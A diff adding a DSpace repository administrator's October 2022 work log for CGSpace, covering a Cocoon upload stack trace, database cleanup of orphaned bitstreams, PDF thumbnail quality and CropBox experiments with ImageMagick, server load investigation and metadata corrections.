+    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.preparePipeline(AbstractProcessingPipeline.java:466)
+    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.prepareInternal(AbstractProcessingPipeline.java:480)
+    at sun.reflect.GeneratedMethodAccessor267.invoke(Unknown Source)
+    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+    at java.lang.reflect.Method.invoke(Method.java:498)
+    at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+    at com.sun.proxy.$Proxy189.prepareInternal(Unknown Source)
+    at org.apache.cocoon.components.source.impl.SitemapSource.init(SitemapSource.java:292)
+    at org.apache.cocoon.components.source.impl.SitemapSource.<init>(SitemapSource.java:148)
+    at org.apache.cocoon.components.source.impl.SitemapSourceFactory.getSource(SitemapSourceFactory.java:62)
+    at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:153)
+    at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:183)
+    at org.apache.cocoon.generation.FileGenerator.setup(FileGenerator.java:99)
+    at sun.reflect.GeneratedMethodAccessor255.invoke(Unknown Source)
+    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+    at java.lang.reflect.Method.invoke(Method.java:498)
+    at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+    at com.sun.proxy.$Proxy190.setup(Unknown Source)
+    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.setupPipeline(AbstractProcessingPipeline.java:343)
+    at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.setupPipeline(AbstractCachingProcessingPipeline.java:710)
+    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.preparePipeline(AbstractProcessingPipeline.java:466)
+    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:411)
+    at sun.reflect.GeneratedMethodAccessor331.invoke(Unknown Source)
+    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+    at java.lang.reflect.Method.invoke(Method.java:498)
+    at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+    at com.sun.proxy.$Proxy189.process(Unknown Source)
+    at org.apache.cocoon.components.treeprocessor.sitemap.SerializeNode.invoke(SerializeNode.java:147)
+    at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:55)
+    at org.apache.cocoon.components.treeprocessor.sitemap.MatchNode.invoke(MatchNode.java:87)
+    at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+    at org.apache.cocoon.components.treeprocessor.sitemap.PipelineNode.invoke(PipelineNode.java:143)
+    at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+    at org.apache.cocoon.components.treeprocessor.sitemap.PipelinesNode.invoke(PipelinesNode.java:81)
+    at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:239)
+    at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:171)
+    at org.apache.cocoon.components.treeprocessor.TreeProcessor.process(TreeProcessor.java:247)
+    at org.apache.cocoon.components.treeprocessor.sitemap.MountNode.invoke(MountNode.java:117)
+    at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:55)
+    at org.apache.cocoon.components.treeprocessor.sitemap.MatchNode.invoke(MatchNode.java:87)
+    at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+    at org.apache.cocoon.components.treeprocessor.sitemap.PipelineNode.invoke(PipelineNode.java:143)
+    at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+    at org.apache.cocoon.components.treeprocessor.sitemap.PipelinesNode.invoke(PipelinesNode.java:81)
+    at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:239)
+    at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:171)
+    at org.apache.cocoon.components.treeprocessor.TreeProcessor.process(TreeProcessor.java:247)
+    at org.apache.cocoon.components.treeprocessor.sitemap.MountNode.invoke(MountNode.java:117)
+    at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+    at org.apache.cocoon.components.treeprocessor.sitemap.PipelineNode.invoke(PipelineNode.java:143)
+    at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+    at org.apache.cocoon.components.treeprocessor.sitemap.PipelinesNode.invoke(PipelinesNode.java:81)
+    at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:239)
+    at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:171)
+    at org.apache.cocoon.components.treeprocessor.TreeProcessor.process(TreeProcessor.java:247)
+    at org.apache.cocoon.servlet.RequestProcessor.process(RequestProcessor.java:351)
+    at org.apache.cocoon.servlet.RequestProcessor.service(RequestProcessor.java:169)
+    at org.apache.cocoon.sitemap.SitemapServlet.service(SitemapServlet.java:84)
+    at javax.servlet.http.HttpServlet.service(HttpServlet.java:728)
+    at org.apache.cocoon.servletservice.ServletServiceContext$PathDispatcher.forward(ServletServiceContext.java:468)
+    at org.apache.cocoon.servletservice.ServletServiceContext$PathDispatcher.forward(ServletServiceContext.java:443)
+    at org.apache.cocoon.servletservice.spring.ServletFactoryBean$ServiceInterceptor.invoke(ServletFactoryBean.java:264)
+    at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:172)
+    at org.springframework.aop.framework.JdkDynamicAopProxy.invoke(JdkDynamicAopProxy.java:204)
+    at com.sun.proxy.$Proxy186.service(Unknown Source)
+    at org.dspace.springmvc.CocoonView.render(CocoonView.java:113)
+    at org.springframework.web.servlet.DispatcherServlet.render(DispatcherServlet.java:1216)
+    at org.springframework.web.servlet.DispatcherServlet.processDispatchResult(DispatcherServlet.java:1001)
+    at org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:945)
+    at org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:867)
+    at org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:951)
+    at org.springframework.web.servlet.FrameworkServlet.doPost(FrameworkServlet.java:853)
+    at javax.servlet.http.HttpServlet.service(HttpServlet.java:647)
+    at org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:827)
+    at javax.servlet.http.HttpServlet.service(HttpServlet.java:728)
+    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:303)
+    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+    at org.dspace.app.xmlui.cocoon.SetCharacterEncodingFilter.doFilter(SetCharacterEncodingFilter.java:113)
+    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+    at org.dspace.app.xmlui.cocoon.DSpaceCocoonServletFilter.doFilter(DSpaceCocoonServletFilter.java:160)
+    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+    at org.dspace.app.xmlui.cocoon.servlet.multipart.DSpaceMultipartFilter.doFilter(DSpaceMultipartFilter.java:119)
+    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+    at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
+    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+    at org.dspace.utils.servlet.DSpaceWebappServletFilter.doFilter(DSpaceWebappServletFilter.java:78)
+    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+    at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:219)
+    at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:110)
+    at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:492)
+    at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:165)
+    at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:104)
+    at org.apache.catalina.valves.CrawlerSessionManagerValve.invoke(CrawlerSessionManagerValve.java:235)
+    at org.apache.catalina.valves.AccessLogValve.invoke(AccessLogValve.java:1025)
+    at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:116)
+    at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:451)
+    at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1201)
+    at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:654)
+    at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:317)
+    at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
+    at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
+    at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
+    at java.lang.Thread.run(Thread.java:750)
+
  • So this is an unintended side effect of the org.apache.cocoon.uploads.autosave=false change I made a few weeks ago
    • Importing the CSV via the command line works fine
+

2022-10-04

+
  • I stumbled across more low-quality thumbnails on CGSpace (a rough count is sketched at the end of this section)
    • Some have the description “Generated Thumbnail”, and others are manually uploaded “.jpg.jpg” ones…
    • I want to add some more thumbnail fixer scripts to the cgspace-java-helpers suite:
      • If an item has an IM Thumbnail and a Generated Thumbnail in the THUMBNAIL bundle, remove the Generated Thumbnail
      • If an item has a PDF bitstream and a JPG bitstream with description /thumbnail/ in the ORIGINAL bundle, remove the /thumbnail/ bitstream in the ORIGINAL bundle and try to remove the /thumbnail/.jpg bitstream in the THUMBNAIL bundle
+
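  • To get a rough idea of how many of each variant exist before writing the fixer, a simple count of the bitstream descriptions should do; this is a sketch that matches any metadata value with those exact strings, which in practice should only be bitstream descriptions:

$ psql -h localhost -U postgres -d dspacetest -c "SELECT text_value, count(*) FROM metadatavalue WHERE text_value IN ('IM Thumbnail', 'Generated Thumbnail') GROUP BY text_value;"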

2022-10-05

+
  • I updated cgspace-java-helpers to include a new FixLowQualityThumbnails script to detect the low-quality thumbnails I found above
  • Add a missing ORCID identifier for an Alliance author
  • I’ve been running the dspace cleanup -v script on CGSpace every few weeks or months and assuming it finished successfully because I didn’t get an error on stdout/stderr, but today I noticed that the script keeps saying it is deleting the same bitstreams
    • I looked in dspace.log and found the error I used to see a lot:
+
Caused by: org.postgresql.util.PSQLException: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
+  Detail: Key (uuid)=(99b76ee4-15c6-458c-a940-866148bc7dee) is still referenced from table "bundle".
+
  • If I manually set the primary bitstream to null, the cleanup script continues until it finds a few more
    • I ended up with a long list of UUIDs to fix before the script would complete:
+
$ psql -d dspace -c "update bundle set primary_bitstream_id=NULL where primary_bitstream_id in ('b76d41c0-0a02-4f53-bfde-a840ccfff903','1981efaa-eadb-46cd-9d7b-12d7a8cff4c4','97a8b1fa-3c12-4122-9c7b-fc2a3eaf570d','99b76ee4-15c6-458c-a940-866148bc7dee','f330fc22-a787-46e2-b8d0-64cc3e166124','592f4a0d-1ed5-4663-be0e-958c0d3e653b','e73b3178-8f29-42bc-bfd1-1a454903343c','e3a5f592-ac23-4934-a2b2-26735fac0c4f','73f4ff6c-6679-44e8-8cbd-9f28a1df6927','11c9a75c-17a6-4966-a4e8-a473010eb34c','155faf93-92c5-4c17-866e-1db50b1f9687','8e073e9e-ab54-4d99-971a-66de073d51e3','76ddd62c-6499-4a8c-beea-3fc8c60200d8','2850fcc9-f450-430a-9317-c42def74e813','8fef3198-2aea-4bd8-aeab-bf5fccb46e42','9e3c3528-e20f-4da3-a0bd-ae9b8515b770')"
+
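  • In hindsight, it should be possible to collect all of the offending primary bitstream IDs in one query instead of re-running the cleanup script repeatedly; a sketch, assuming the deleted flag on the bitstream table in the DSpace 6 schema:

$ psql -d dspace -c "SELECT uuid, primary_bitstream_id FROM bundle WHERE primary_bitstream_id IN (SELECT uuid FROM bitstream WHERE deleted = 't');"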

2022-10-06

+
  • I finished running the cleanup script on CGSpace, and the before and after counts of assetstore files are interesting:
+
$ find /home/cgspace.cgiar.org/assetstore -type f | wc -l
+181094
+$ find /home/cgspace.cgiar.org/assetstore -type f | wc -l
+178329
+
  • So that cleaned up ~2,700 bitstreams!
  • Interestingly, someone on the DSpace Slack mentioned this as a known issue, with discussion, reproducers, and a pull request: https://github.com/DSpace/DSpace/issues/7348
  • I am having an issue with the new FixLowQualityThumbnails script on some communities like 10568/117865 and 10568/97114
    • For some reason it doesn’t descend into the collections
    • Also, my old FixJpgJpgThumbnails doesn’t either… weird
    • I might have to resort to getting a list of collections and doing it that way:
+
$ psql -h localhost -U postgres -d dspacetest -c 'SELECT ds6_collection2collectionhandle(uuid) FROM collection WHERE uuid in (SELECT uuid FROM collection);' |
+    sed 1,2d |
+    tac |
+    sed 1,3d > /tmp/collections
+
  • Strange, I don’t think doing it by collections is actually working, because the script says it’s replacing the bitstreams but nothing actually changes
    • I don’t have time to figure out what’s happening; I see “update_item” in dspace.log when the script says it’s working, but the bitstreams are not replaced
    • I might just extract a list of items that have .jpg.jpg thumbnails from the database and run the script in item mode
    • There might be a problem with the context commit logic…?
  • I exported a list of items that have .jpg.jpg thumbnails on CGSpace:
+
$ psql -h localhost -p 5432 -U postgres -d dspacetest -c "SELECT ds6_bitstream2itemhandle(dspace_object_id) FROM metadatavalue WHERE text_value ~ '.*\.(jpg|jpeg|JPG|JPEG)\.(jpg|jpeg|JPG|JPEG)' AND dspace_object_id IS NOT NULL;" |
+  sed 1,2d |
+  tac |
+  sed 1,3d |
+  grep -v '␀' |
+  sort -u |
+  sed 's/ //' > /tmp/jpgjpg-handles.txt
+
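  • Assuming FixJpgJpgThumbnails lives in the same package as FixLowQualityThumbnails and accepts a handle argument like the other helpers, the item-mode run over that list would look roughly like this:

$ while read -r handle; do
    chrt -b 0 dspace dsrun io.github.ilri.cgspace.scripts.FixJpgJpgThumbnails "$handle" | tee -a /tmp/FixJpgJpgThumbnails.log
done < /tmp/jpgjpg-handles.txt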
  • I restarted DSpace Test because it has had high load since yesterday and I don’t know why
  • Run check-duplicates.py on the 1,642 MARLO Innovations to try to include matches from the OICRs we uploaded last month
    • Then I processed those matches like I did with the OICRs themselves last month, cleaned them one last time with csv-metadata-quality, created a SAF bundle, and uploaded them to CGSpace
    • BTW this bumps CGSpace over 100,000 items…
    • Then I did the same for the 749 MARLO MELIAs and imported them to CGSpace
  • Meeting about CG Core types with Abenet, Marie-Angelique, Sara, Margarita, and Valentina
  • I made some minor logic changes to the FixJpgJpgThumbnails script in cgspace-java-helpers
    • Now it checks that the bitstream description is not empty or null, and also excludes Maps (in addition to Infographics), since those are likely to be JPEG files in the ORIGINAL bundle on purpose
+

2022-10-07

+
  • I did the matching and cleaning on the 512 MARLO Policies and uploaded them to CGSpace
  • I sent a list of the IDs and handles for all four groups of MARLO items to Jose so he can set up the redirects on their server:
+
$ wc -l /tmp/*mappings.csv
+  1643 /tmp/crp-innovation-mappings.csv
+   750 /tmp/crp-melia-mappings.csv
+   683 /tmp/crp-oicr-mappings.csv
+   513 /tmp/crp-policy-mappings.csv
+  3589 total
+
  • I fixed the mysterious issue with my cgspace-java-helpers scripts not working on communities and collections
    • It was because the code wasn’t committing the context!
    • I ran both FixJpgJpgThumbnails and FixLowQualityThumbnails on a dozen or so large collections on CGSpace and processed about 1,200 low-quality thumbnails
  • I did a complete re-sync of CGSpace to DSpace Test
+

2022-10-08

+
  • Start a harvest on AReS
  • Experiment with PDF thumbnails in ImageMagick again; I found an interesting reference on their legacy website saying we can use -unsharp after -thumbnail to make them less blurry
    • Here are a few examples with different unsharp values, starting from the DSpace default of flattening the PDF to a JPEG and then generating the thumbnail in a second operation:
+
$ convert '10568-103447.pdf[0]' -flatten 10568-103447-dspace-step1.pdf.jpg 
+$ convert 10568-103447-dspace-step1.pdf.jpg -thumbnail 600x600 -unsharp 0x.5 10568-103447-dspace-step2-600-unsharp.pdf.jpg
+$ convert 10568-103447-dspace-step1.pdf.jpg -thumbnail 600x600 -unsharp 2x0.5+0.7+0 10568-103447-dspace-step2-600-unsharp2.pdf.jpg
+$ convert 10568-103447-dspace-step1.pdf.jpg -thumbnail 600x600 -unsharp 0x0.75+0.75+0.008 10568-103447-dspace-step2-600-unsharp3.pdf.jpg
+$ convert 10568-103447-dspace-step1.pdf.jpg -thumbnail 600x600 -unsharp 1.5x1+0.7+0.02 10568-103447-dspace-step2-600-unsharp4.pdf.jpg
+
  • I merged all the changes from 6_x-dev to 6_x-prod after having run them on DSpace Test for the last ten days
+

2022-10-11

+ +

2022-10-12

+
  • I submitted a pull request to DSpace 7 for the -unsharp 0x0.5 change: https://github.com/DSpace/DSpace/pull/8515
  • I did some tests on CGSpace and verified that MEL will indeed need admin permissions on every collection that they want to map items to
  • I had a call with Salem and he asked me about redirecting from some CRP duplicates that exist in both MELSpace and CGSpace
    • We decided that the only way is to use an HTTP 301 redirect in the nginx web server, but I said I’d check with CNRI to see if there is a way to do this within the Handle system
+

2022-10-13

+
  • Disable the REST API cache on CGSpace temporarily to see if that fixes a strange problem we are seeing with listing publications on ilri.org
  • Meeting with MEL, MARLO, and CG Core people to continue discussing dcterms.type
  • I added the new MEL account to all the appropriate authorizations for Initiatives that ICARDA is involved in on CGSpace
    • I still have to add the few that WorldFish is involved in
+

2022-10-14

+
  • Abenet finalized adding the MEL user to all Initiative collections on CGSpace
  • Re-sync CGSpace to DSpace Test to get the new MEL user and authorizations
  • I checked ilri.org and I see more publications for 2021 and earlier
    • The results are still strange, though, because I only see a few for each year
+

2022-10-15

+
  • I’m going to turn the REST API cache on CGSpace back on to see if the ilri.org publications listing breaks again
  • Start a harvest on AReS
+

2022-10-16

+
  • The harvest on AReS finished, but somehow there are 10,000 fewer items than the previous indexing… hmmm
    • I don’t see any hits from MELSpace there, so I will start another harvest…
    • After starting the harvest the load on the server went up to 20 and UptimeRobot said CGSpace was down for three hours, sigh
    • I stopped the harvest and the load went down immediately
    • I am trying to find a pattern in the load spikes on Sundays
  • I see this in the AReS backend logs:
+
[Nest] 1   - 10/16/2022, 6:42:04 PM   [HarvesterService] Starting Harvest =>0
+[Nest] 1   - 10/16/2022, 6:42:07 PM   [HarvesterService] Starting Harvest =>101555
+[Nest] 1   - 10/16/2022, 6:42:10 PM   [HarvesterService] Starting Harvest =>4936
+
  • Which means MELSpace is having some issue
  • I’m not sure what was going on with CGSpace yesterday, but the load was indeed very high according to Munin:
+

CGSpace CPU load day

+
  • The pattern on Sundays is clear if you look at the past month:
+

CGSpace CPU load month

+
  • I have yet to find an nginx request pattern that correlates with the increased load, but looking back over the last year it seems something started happening around March 2022, and I also start seeing CPU steal in July (the red coming down from the top of the graph):
+

CGSpace CPU load year

+
  • The amount of CPU steal is very low if I look at it now, around 1 or 2 percent, but what’s happening reminds me of the mysterious load problems I had in 2019-03 that were due to CPU steal (a quick check is shown below)
  • Salem said there was an issue with the sitemaps on MELSpace, which is why it wasn’t working in AReS
    • Load on CGSpace is low in the evening, so I’ll start a new AReS harvest
+
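  • For a quick look at the current CPU steal without waiting for Munin to update, iostat can print it directly; the %steal column in the second report is the live value rather than the since-boot average:

$ iostat -c 5 2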

2022-10-18

+
  • Start mapping the Initiative names on CGSpace to the new short names from Enrico’s spreadsheet
  • Then I will update them for existing CGSpace items:
+
$ ./ilri/fix-metadata-values.py -i 2022-10-18-update-initiatives.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.initiative -m 258 -t correct -d -n
+
  • And later in the controlled vocabulary
  • Apply some corrections to a few hundred items on CGSpace for Peter
  • Meeting with Abenet, Sara, and Valentina about CG Core types
    • We finished going over our list and agreed to send a message to the concerned parties in our organizations for feedback by November 4th
    • Next week we will continue working on the definitions
  • Re-sync CGSpace to DSpace Test to get the latest Initiatives changes
    • I also need to re-create the CIAT/Alliance TIP accounts so they can continue testing
    • I re-created the tip-submit@cgiar.org and tip-approve@cgiar.org accounts on DSpace Test
    • According to my notes:
      • A user must be in the collection admin group in order to deposit via the REST API (not in the collection’s “Submit” group, which is for normal submission)
      • A user must be in the collection’s “Accept/Reject/Edit Metadata” step in order to see and approve the item in the DSpace workflow
    • I created a new “TIP test” collection under Alliance’s community and added the users accordingly
    • I think I’ll be able to just add these two submit/approve users to the Alliance Admins and Alliance Editors groups once we’re ready
+

2022-10-19

+ +

gs thumbnail

+
  • In other news, I see that pdftocairo from the poppler package produces a similar, though slightly prettier, version of the thumbnail for that PDF:
+

pdftocairo thumbnail

+
  • I used the command:
+
$ pdftocairo -jpeg -singlefile -f 1 -l 1 -scale-to-x 640 -scale-to-y -1 10568-116598.pdf thumb
+
  • The Ghostscript developers responded in a few minutes (!) and explained that PDFs can contain many different “boxes”:
+
+

PDF files can have multiple different ‘Box’ values; ArtBox, BleedBox, CropBox, MediaBox and TrimBox. The MediaBox is required; the other boxes are optional. A given PDF page description must contain the MediaBox and may contain any or all of the others.

+

By default Ghostscript uses the MediaBox to determine the size of the media. Other PDF consumers may exhibit other behaviours.

+

The pages in your PDF file contain all of the Boxes. In the majority of cases the Boxes all contain the same values (which makes their inclusion pointless of course). But for page 1 they differ:

+

/CropBox[594.375 0.0 1190.55 839.176]
/MediaBox[0.0 0.0 1190.55 841.89]

+

You can tell Ghostscript to use a different Box value for the media by using one of -dUseArtBox, -dUseBleedBox, -dUseCropBox, -dUseTrimBox. If I specify -dUseCropBox then the file is rendered as you expect.

+
+
  • I confirmed that adding -define pdf:use-cropbox=true to the ImageMagick command produces a better thumbnail in this case
    • We can check the boxes in a PDF using pdfinfo from the poppler package:
+
$ pdfinfo -box data/10568-116598.pdf
+Creator:         Adobe InDesign 17.0 (Macintosh)
+Producer:        Adobe PDF Library 16.0.3
+CreationDate:    Tue Dec  7 12:44:46 2021 EAT
+ModDate:         Tue Dec  7 15:37:58 2021 EAT
+Custom Metadata: no
+Metadata Stream: yes
+Tagged:          no
+UserProperties:  no
+Suspects:        no
+Form:            none
+JavaScript:      no
+Pages:           17
+Encrypted:       no
+Page size:       596.175 x 839.176 pts
+Page rot:        0
+MediaBox:            0.00     0.00  1190.55   841.89
+CropBox:           594.38     0.00  1190.55   839.18
+BleedBox:          594.38     0.00  1190.55   839.18
+TrimBox:           594.38     0.00  1190.55   839.18
+ArtBox:            594.38     0.00  1190.55   839.18
+File size:       572600 bytes
+Optimized:       no
+PDF version:     1.6
+
  • In this case the MediaBox is a strange size, and we should use the CropBox
    • I wonder if we can check that from DSpace… (a rough command-line check is sketched below)
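  • We can’t easily check it from inside DSpace yet, but a rough command-line check for PDFs whose CropBox differs from their MediaBox could look like this (a sketch that only compares the first page, using the pdfinfo -box output shown above):

$ for pdf in *.pdf; do
    boxes=$(pdfinfo -box "$pdf" 2>/dev/null | awk '/^MediaBox|^CropBox/ {$1=""; print}' | sort -u | wc -l)
    [ "$boxes" -gt 1 ] && echo "$pdf: CropBox differs from MediaBox"
done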
  • Apply some corrections from Peter on CGSpace
  • Meeting with Leroy, Daniel, Francesca, and Maria from Alliance to review their TIP tool and talk about next steps
    • We asked them to do some real submissions (as opposed to “I like coffee” etc.) to test the full breadth of the metadata and controlled vocabularies
  • Minor work on the CG Core types spreadsheet to clear up some of the actions and incorporate some of Peter’s feedback
  • After looking at the request patterns in nginx on CGSpace for the past few weeks, I see nothing that would explain the high loads we see several times per week (especially on Sundays!)
    • So I suspect there is a noisy neighbor; I do see a non-trivial amount of CPU steal in my Munin graphs and in iostat
    • I asked Linode to move the instance elsewhere
+

2022-10-22

+
  • Start a harvest on AReS
+

2022-10-24

+
  • Peter sent me some corrections for affiliations:
+
$ cat 2022-10-24-affiliations.csv 
+cg.contributor.affiliation,correct
+Wageningen University and Research Centre,Wageningen University & Research
+Wageningen University and Research,Wageningen University & Research
+Wageningen University,Wageningen University & Research
+$ ./ilri/fix-metadata-values.py -i 2022-10-24-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211 -t correct -d
+
  • Add an ORCID identifier for Claudia Arndt on CGSpace and tag her existing items
  • Linode responded to my request from last week and said they don’t think the culprit here is CPU steal, but that they will move us to another host anyway
    • I still need to check the Munin graphs
+

2022-10-25

+
  • Upload some changes to items on CGSpace for Peter
  • Start a full Discovery reindex on CGSpace:
+
$ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
+real    226m40.463s
+user    132m6.511s
+sys     3m15.077s
+

2022-10-26

+
  • We published the infographic and blog post to mark CGSpace’s 100,000th item
    • I generated a high-quality thumbnail using ImageMagick in order to tweet it:
+
$ convert -density 144 10568-125167.pdf\[0\] -thumbnail x1200 /tmp/10568-125167.pdf.png
+$ pngquant /tmp/10568-125167.pdf.png
+
  • Spent some time looking at the MediaBox / CropBox handling in DSpace’s ImageMagickThumbnailFilter.java
    • We need to make sure to put -define pdf:use-cropbox=true before we specify the input file, or else it will not have any effect (see the example below)
+
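  • A minimal illustration of why the ordering matters, reusing the PDF from the example above (output file names are arbitrary): ImageMagick treats -define as a read setting, so it only affects input files that come after it on the command line:

# Setting placed before the input file: the CropBox is used when rasterising the PDF
$ convert -define pdf:use-cropbox=true 10568-116598.pdf\[0\] -flatten /tmp/cropbox-honoured.pdf.jpg
# Setting placed after the input file: too late, the page was already read using the MediaBox
$ convert 10568-116598.pdf\[0\] -define pdf:use-cropbox=true -flatten /tmp/cropbox-ignored.pdf.jpg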

2022-10-27

+ +
$ pdfcpu box rem -- "crop" in.pdf out.pdf
+
  • I filed an issue on DSpace for the ImageMagick CropBox problem
    • I decided that this is a bug that should be fixed separately from the “improving thumbnail quality” issue
    • I made a pull request to fix the CropBox issue
  • I did more work on my improved-dspace-thumbnails microsite to complement the DSpace thumbnail pull requests
    • I am updating it to recommend using the PDF CropBox and “supersampling” with a higher density than 72
    • I measured the execution time of ImageMagick with time and found that the higher-density mode takes about five times longer on average
    • I measured the maximum heap memory of ImageMagick with Valgrind’s Massif tool:
+
$ valgrind --tool=massif magick convert ...
+
  • Then I checked the results for each set of default DSpace thumbnail runs and “improved” thumbnail runs using ms_print (a hacky way to get the max heap, I know):
+
$ for file in memory-dspace/massif.out.49*; do ms_print "$file" | grep -A1 "    MB" | tail -n1 | sed 's/\^.*//'; done
+15.87
+16.06
+21.26
+15.88
+20.01
+15.85
+20.06
+16.04
+15.87
+15.87
+20.02
+15.87
+15.86
+19.92
+10.89
+$ for file in memory-improved/massif.out.5*; do ms_print "$file" | grep -A1 "    MB" | tail -n1 | sed 's/\^.*//'; done
+245.3
+245.5
+298.6
+245.3
+306.8
+245.2
+306.9
+245.5
+245.2
+245.3
+306.8
+245.3
+244.9
+306.3
+165.6
+
  • Ouch, this shows that it takes about fifteen times more memory to use the “4x” density of 288!
    • It seems more reasonable to use a “2x” density of 144:
+
$ for file in memory-improved-144/*; do ms_print "$file" | grep -A1 "    MB" | tail -n1 | sed 's/\^.*//'; done
+61.80
+62.00
+76.76
+61.82
+77.43
+61.77
+77.48
+61.98
+61.76
+61.81
+77.44
+61.81
+61.69
+77.16
+41.84
  • There’s a really cool visualizer called massif-visualizer, but the raw massif output isn’t easy to parse otherwise
  • +
+

2022-10-28

+
  • I finalized the code for the ImageMagick density change and made a pull request against DSpace 7.x
+

2022-10-29

+
  • Start a harvest on AReS
+

2022-10-31

+
  • Tag version 6.1 of cgspace-java-helpers: https://github.com/ilri/cgspace-java-helpers/releases/tag/v6.1
    • I also pushed a more recent 6.1-SNAPSHOT version to Maven Central via OSSRH
    • I should probably push a non-SNAPSHOT release, but I don’t have time to figure that out in Maven
  • Add some new items on CGSpace and update others for Peter
  • Email Mishell from CIP about their old theses, which are using Creative Commons licenses
    • They said it’s OK, so I updated all sixteen items in that collection
  • Move the “MEL submissions” collection on CGSpace from ICARDA’s community to the Initiatives community
  • Meeting with Peter and Abenet about ongoing CGSpace action points
  • I created the authorizations for Alliance’s TIP tool to submit on CGSpace
diff --git a/docs/2022-11/index.html b/docs/2022-11/index.html
new file mode 100644
index 000000000..13f94879c
--- /dev/null
+++ b/docs/2022-11/index.html

November, 2022 | CGSpace Notes

November, 2022

2022-11-01

+
  • Last night I re-synced DSpace 7 Test from CGSpace
    • I also updated all my local 7_x-dev branches against the latest upstream
  • I spent some time updating the authorizations in Alliance collections
    • I want to make sure they use groups instead of individuals where possible!
  • I reverted the Cocoon autosave change: Peter not being able to upload CSVs from the web interface is more of a nuisance than the very low-severity security issue the change was meant to mitigate
+ +

2022-11-02

+
  • I joined the FAO–CGIAR AGROVOC results-sharing meeting
